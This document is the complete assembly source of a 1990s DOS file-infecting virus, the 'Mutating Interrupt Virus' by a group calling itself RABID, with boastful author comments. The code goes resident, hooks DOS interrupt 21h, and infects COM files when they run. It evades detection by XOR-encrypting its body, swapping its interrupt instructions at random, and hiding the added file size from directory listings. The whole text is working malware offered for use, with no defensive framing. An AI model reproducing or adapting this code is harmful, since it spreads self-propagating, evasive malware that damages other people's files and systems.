;**************************************************************************** ;* The Mutating Interrupt Virus -Soltan Griss- ;* [RABID] -=+ Front 242 +=- ;* ;* ;* Well this is my Third Release of many to come. This virus uses the latest ;* of RABID's new inventions the "MUTATING INTERRUPT", what it does (nothing ;* to special) is Mutate all int 21h (CD 21) to a random interrupt. ;* Then before executation it will change it back to INT 21. ;* ;* Alot of people are wondering if RABID is Still around. YES. Wea reback and ;* Kicking, although right now we have limited members, it soon will change. ;* ;* ;* Many Thanks go out to Data Disruptor, who originally came up with the ;* interrupt swapping idea. ;* ;* ;* SOON TO COME: Why use conventional memory when do has left so many holes?? ;* Find out soon in one of our next RELEASES. ;* ;* A Real Mutating virus with moveable modular segments!!! ;* ;* ;* ;* A Word of thanks go out to. ;* ;* YAM- Keep up the hard work. Alot of improvement come with time. ;* Admiral Bailey. Waitinf for the next version of the IVP! ;* ;* ;**************************************************************************** seg_a segment assume cs:seg_a,ds:seg_a,es:nothing org 100h start: db 0E9h,06,00,42h,0f2h ; Jump to virus + F242 id string vstart equ $ key: dw 0 ;encryptor key. i_key: dw 12cdh ;Interrupt key call code_start code_start: pop si sub si,offset code_start ;get current infected files size mov bp,si crypter: mov cx,(vend-check) mov dh,byte ptr cs:[key+bp] mov si,offset check add si,bp loo: mov ah,byte ptr cs:[si] ;Decrypt the virus xor ah,dh mov byte ptr cs:[si],ah inc si loop loo code: mov si,offset check mov di,offset check mov cx,(vend-check) looper: mov ax,[si] cmp ax,word ptr cs:[i_key+bp] ;Change interrupts back je change doit: mov [di],ax inc si inc di loop looper jmp check change: mov ax,21cdh jmp doit info: db 'The Mutating Interrupt Virus ' db 'RABID`S Back and Kicking in `93 -Soltan Griss-' check: mov ax,0F242h ;Check to see if we are already int 12h cmp bx,0F242h ;resident je Already_here load: ;Virus Id string so they NAME it ; RIGHT!!!! push cs pop ds mov ah,49h ;Release current Memory block int 12h mov ah,48h ;Request Hugh size of memory mov bx,0ffffh ;returns biggest size int 12h mov ah,4ah sub bx,(vend-vstart+15)/16+(vend-vstart+15)/16+1 jc exit ;subtract virus size int 12h mov ah,48h mov bx,(vend-vstart+15)/16+(vend-vstart+15)/16 int 12h jc exit ;request last XXX pages ;allocate it to virus dec ax push es mov es,ax mov byte ptr es:[0],'Z' ;make DOS the owner mov word ptr es:[1],8 mov word ptr es:[3],(vend-vstart+15)/8 ;put size here sub word ptr es:[12h],(vend-vstart+15)/8 ;sub size from current ;memory inc ax lea si,[bp+offset vstart] ;copy it to new memory block xor di,di mov es,ax mov cx,(vend-vstart+5)/2 cld rep movsw xor ax,ax mov ds,ax push ds lds ax,ds:[21h*4] ;swap vectors manually mov word ptr es:[old_21-vstart],ax mov word ptr es:[old_21-vstart+2],ds pop ds mov word ptr ds:[21h*4],(new_21-vstart) mov ds:[21h*4+2],es exit: already_here: push cs pop ds push cs pop es mov si,offset buffer ;Copy five bytes back! add si,Bp mov di,100h movsw movsw movsb mov bp,100h jmp bp ;*************************************************************************** old_21: dw 0h,0h buffer db 0cdh,20h,0,0,0 ;Buffer to hold the infected old_date: dw 0 ;files 5 bytes old_time: dw 0 jump_add: db 0E9h db 0,0 db 0F2h,42h new_21: cmp ax,0f242h ;Are we going resident? je SAY_YES cmp ax,4b00h ;Are we executing? je exec cmp ah,11h je hide_size ;doing a DIR?? cmp ah,12h je hide_size jmp do_old exec: jmp exec2 SAY_YES:mov bx,0f242h do_old: jmp dword ptr cs:[(old_21-vstart)] ;If not then do old int 21 ret hide_size: pushf push cs call do_old ;get the current FCB cmp al,00h jnz dir_error ;jump if bad FCB push ax push bx push dx push ds push es ;undocumented get FCB mov ah,51h ;location int 12h mov es,bx ;get info from FCB cmp bx,es:[16h] jnz not_inf mov bx,dx mov al,[bx] push ax mov ah,2fh ;get DTA int 12h pop ax inc al ;Check for extended FCB jnz normal_fcb add bx,7h normal_fcb: mov ax,es:[bx+17h] and ax,1fh xor al,01h ;check for 2 seconds jnz not_inf and byte ptr es:[bx+17h],0e0h ;subtract virus size sub es:[bx+1dh],(vend-vstart) sbb es:[bx+1fh],ax not_inf:pop es pop ds pop dx pop bx pop ax dir_error: iret exec2: push ax push bx push cx push dx push ds push es call infect ;Lets infect the file!! backup: pop es pop ds pop dx pop cx pop bx pop ax jmp do_old ;go back to original load infect: mov ax,3d02h int 12h jc quit1 ;open the file mov bx,ax A_open: push cs pop ds mov ax,4200h xor cx,cx xor dx,dx ;move file pointer to begining int 12h ;(FOR LATER MODIFICATION ONLY) mov ah,3fh mov cx,5h mov dx,(buffer-vstart) ;load in the first 5 bytes int 12h jc quit1 cmp word ptr cs:[(buffer-vstart)],5A4Dh ;check to see if its an je quit1 ;EXE cmp word ptr cs:[(buffer-vstart)+3],42F2h je quit1 ;if so then its infected jmp qqqq quit1: jmp quit2 qqqq: mov ax,5700h int 12h jc quit1 mov word ptr cs:[(old_time-vstart)],cx ;get the files time mov word ptr cs:[(old_date-vstart)],dx ;and date mov ax,4202h xor cx,cx xor dx,dx ;put file pointer at end int 12h jc quit1 mov cx,ax sub cx,3 ;write jump lenght to jump buffer add cx,4 mov word ptr cs:[(jump_add+1-vstart)],cx mov ah,2ch ;get random number for interrupt int 12h ;swapping cmp dh,03h ;don't like INT 3'S (1 byte only not 2) jne write_key inc dh write_key: mov word ptr cs:[key-vstart],cx ;save encryption key mov byte ptr cs:[i_key-vstart+1],dh ;save interupt key mov si,(check-vstart) ;write from check to end mov di,(vend-vstart) mov cx,(vend-check) topper: mov al,byte ptr cs:[(si)] cmp al,0cdh je changeit top2: mov byte ptr cs:[(di)],al tor: inc si ;this "mutating routine" is kind inc di ;messy but i'll improve it for version loop topper ;2.0 jmp crypt changeit: mov byte ptr cs:[(di)],al inc di inc si dec cx mov al,byte ptr cs:[(si)] cmp al,21h jne top2 mov byte ptr cs:[(di)],dh jmp tor quit: jmp quit2 crypt: mov cx,(vend-check) mov dh,byte ptr cs:[key-vstart] mov si,(vend-vstart) lop: mov ah,byte ptr cs:[si] xor ah,dh ;Encrypt the code mov byte ptr cs:[si],ah inc si loop lop mov cx,(check-vstart) mov ah,40h ;write decrypting routine mov dx,(vstart-vstart) ;to file first int 12h jc quit mov cx,(vend-check) ;write the encrypted code mov ah,40h ; to the end of the file mov dx,(vend-vstart) int 12h jc quit mov ax,4200h ;move file pointer to the xor cx,cx ;begining to write the JMP xor dx,dx int 12h mov cx,5 mov ah,40h ;write the JMP top the file mov dx,(jump_add-vstart) int 12h jc quit mov ax,5701h mov word ptr cx,cs:[(old_time-vstart)] ;Restore old time,date mov word ptr dx,cs:[(old_date-vstart)] and cl,0e0H inc cl ;change seconds to 2 int 12h mov ah,3eh int 12h quit2: ret vend equ $ nop nop seg_a ends end start ;WELL THATS IT. If ya have any questions feel free to contact me on -=+ FRONT 242 +=- (CANADA)